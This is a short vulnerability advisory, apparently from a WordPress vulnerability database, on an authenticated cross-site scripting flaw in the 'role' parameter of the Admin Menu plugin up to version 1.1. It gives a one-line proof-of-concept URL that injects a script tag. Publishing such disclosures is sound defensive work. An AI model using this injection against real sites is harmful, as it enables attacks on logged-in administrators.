WordPress Plugin Vulnerabilities
Admin Menu <= 1.1 - Authenticated Cross-Site Scripting (XSS)
Description
The Admin Menu WordPress plugin, versions 1.1 and below, were vulnerable to Authenticated Cross-Site Scripting (XSS) within the "role" GET parameter.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=admin-menu-pro&role=<script>alert(String.fromCharCode(88,83,83))</script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
zerodetail & ratherbland
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-08-10 (about 3 years ago)
Added
2020-08-26 (about 3 years ago)
Last Updated
2020-08-27 (about 3 years ago)